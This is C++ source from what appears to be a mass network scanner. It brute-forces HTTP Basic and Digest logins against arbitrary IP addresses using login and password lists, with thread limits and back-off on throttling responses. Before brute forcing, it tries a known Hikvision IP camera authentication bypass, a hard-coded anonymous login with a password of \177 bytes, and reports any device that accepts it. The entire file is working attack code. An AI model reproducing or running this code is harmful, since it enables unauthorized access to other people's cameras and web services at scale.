#include "BasicAuth.h" #include "FileUpdater.h" int BA::checkOutput(const string *buffer, const char *ip, const int port) { if((Utils::ustrstr(*buffer, "200 ok") != -1 || Utils::ustrstr(*buffer, "http/1.0 200") != -1 || Utils::ustrstr(*buffer, "http/1.1 200") != -1) && Utils::ustrstr(*buffer, "http/1.1 401 ") == -1 && Utils::ustrstr(*buffer, "http/1.0 401 ") == -1 && Utils::ustrstr(*buffer, "401") == -1 && Utils::ustrstr(*buffer, "Unauthorized") == -1 && Utils::ustrstr(*buffer, "νεοπΰβθλόνϋ") == -1 && Utils::ustrstr(*buffer, "ΠΠ΅ΠΏΡ€Π°Π²ΠΈΠ»ΡŒΠ½Ρ‹") == -1 ) { return 1; } else if (Utils::ustrstr(*buffer, "http/1.1 404") != -1 || Utils::ustrstr(*buffer, "http/1.0 404") != -1) { stt->doEmitionRedFoundData("BA - 404 " + QString(ip) + ":" + QString::number(port)); return -2; } else if (Utils::ustrstr(*buffer, "503 service unavailable") != -1 || Utils::ustrstr(*buffer, "http/1.1 503") != -1 || Utils::ustrstr(*buffer, "http/1.0 503") != -1 || Utils::ustrstr(*buffer, "400 BAD_REQUEST") != -1 || Utils::ustrstr(*buffer, "400 bad request") != -1 || Utils::ustrstr(*buffer, "403 Forbidden") != -1 ) { stt->doEmition_BARedData("[.] 503/400/403 - Waiting 30sec (" + QString(ip) + ":" + QString::number(port) + ")"); Sleep(30000); return -1; } return 0; } //http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities 2 inline bool commenceHikvisionEx1(const char *ip, const int port, bool digestMode) { std::string lpString = string("anonymous") + ":" + string("\177\177\177\177\177\177"); string buffer; int res = Connector::nConnect(ip, port, &buffer, NULL, NULL, &lpString, digestMode); if (res > 0) { if (BA::checkOutput(&buffer, ip, port) == 1) return 1; } return 0; } lopaStr BA::BABrute(const char *ip, const int port, bool digestMode) { string buffer; string lpString; lopaStr lps = {"UNKNOWN", "", ""}; int passCounter = 0; int res = 0; if (commenceHikvisionEx1(ip, port, digestMode)) { stt->doEmitionGreenFoundData("Hikvision exploit triggered! (" + QString(ip) + ":" + QString::number(port) + ")"); strcpy(lps.login, "anonymous"); strcpy(lps.pass, "\177\177\177\177\177\177"); return lps; } for(int i = 0; i < MaxLogin; ++i) { for (int j = 0; j < MaxPass; ++j) { FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;}); if (!globalScanFlag) return lps; lpString = string(loginLst[i]) + ":" + string(passLst[j]); res = Connector::nConnect(ip, port, &buffer, NULL, NULL, &lpString, digestMode); if (res == -2) return lps; else if (res != -1) { res = checkOutput(&buffer, ip, port); if (res == -2) return lps; if (res == -1) { ++i; break; } if (res == 1) { strcpy(lps.login, loginLst[i]); strcpy(lps.pass, passLst[j]); return lps; }; } if (BALogSwitched) stt->doEmitionBAData("BA: " + QString(ip) + ":" + QString::number(port) + "; l/p: " + QString(loginLst[i]) + ":" + QString(passLst[j]) + "; - Progress: (" + QString::number((++passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%)"); Sleep(100); } } return lps; } lopaStr BA::BALobby(const char *ip, const int port, bool digestMode) { if(gMaxBrutingThreads > 0) { while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000); ++baCount; ++BrutingThrds; const lopaStr &lps = BABrute(ip, port, digestMode); --BrutingThrds; return lps; } else { lopaStr lps = {"UNKNOWN", "", ""}; return lps; } }